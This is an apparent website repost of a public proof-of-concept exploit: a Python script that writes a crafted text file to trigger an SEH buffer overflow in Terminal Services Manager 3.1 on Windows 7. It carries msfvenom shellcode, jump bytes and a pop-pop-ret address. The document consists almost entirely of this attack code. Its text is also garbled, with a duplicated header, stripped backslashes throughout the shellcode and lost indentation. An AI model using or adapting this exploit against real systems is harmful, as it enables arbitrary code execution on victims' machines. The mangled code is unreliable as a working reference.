Terminal Services Manager 3.1 Local Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 467

# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH)
# Date: 2018-12-25
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Terminal Services Mana # Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH)
# Date: 2018-12-25
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Terminal Services Manager 3.1
# Vendor Homepage: https://lizardsystems.com
# Version: 3.1
# Software Link: https://lizardsystems.com/download/tsmanager_setup.exe
# Tested Windows 7 SP1 x86

# Other affected software from the vendor
# Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe
# Software Link: https://lizardsystems.com/download/rshutdown_setup.exe
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe

# PoC
# 1. run script
# 2. run add computers wizard
# 3. select import from files
# 4. paste tsmang.txt into computer names field
# 5. pop calc

#bad chars x00x0dx0e

#!/usr/bin/python

import struct

junk2 = "A"*100
junk1 = "B"*74
jmp2 = "xe9x71xfexffxffxcc"
jmp1 = "xebxf8xccxcc"

#0x0049709f : pop esi # pop ebx # ret tsmanager.exe
seh = struct.pack('<L',0x0049709f)

#Payload size: 220 bytes
#msfvenom -p windows/exec CMD=calc.exe -b "x00x0dx0e" -f python
calc = ""
calc += "xdbxcdxd9x74x24xf4x5ax2bxc9xbexbbx1exdd"
calc += "x8exb1x31x31x72x18x83xc2x04x03x72xafxfc"
calc += "x28x72x27x82xd3x8bxb7xe3x5ax6ex86x23x38"
calc += "xfaxb8x93x4axaex34x5fx1ex5bxcfx2dxb7x6c"
calc += "x78x9bxe1x43x79xb0xd2xc2xf9xcbx06x25xc0"
calc += "x03x5bx24x05x79x96x74xdexf5x05x69x6bx43"
calc += "x96x02x27x45x9exf7xffx64x8fxa9x74x3fx0f"
calc += "x4bx59x4bx06x53xbex76xd0xe8x74x0cxe3x38"
calc += "x45xedx48x05x6ax1cx90x41x4cxffxe7xbbxaf"
calc += "x82xffx7fxd2x58x75x64x74x2ax2dx40x85xff"
calc += "xa8x03x89xb4xbfx4cx8dx4bx13xe7xa9xc0x92"
calc += "x28x38x92xb0xecx61x40xd8xb5xcfx27xe5xa6"
calc += "xb0x98x43xacx5cxccxf9xefx0ax13x8fx95x78"
calc += "x13x8fx95x2cx7cxbex1exa3xfbx3fxf5x80xf4"
calc += "x75x54xa0x9cxd3x0cxf1xc0xe3xfax35xfdx67"
calc += "x0fxc5xfax78x7axc0x47x3fx96xb8xd8xaax98"
calc += "x6fxd8xfexfaxeex4ax62xd3x95xeax01x2b"

buffer = junk2 + calc + junk1 + jmp2 + jmp1 + seh

with open("tsmang.txt","wb") as f:
f.write(buffer[:-1])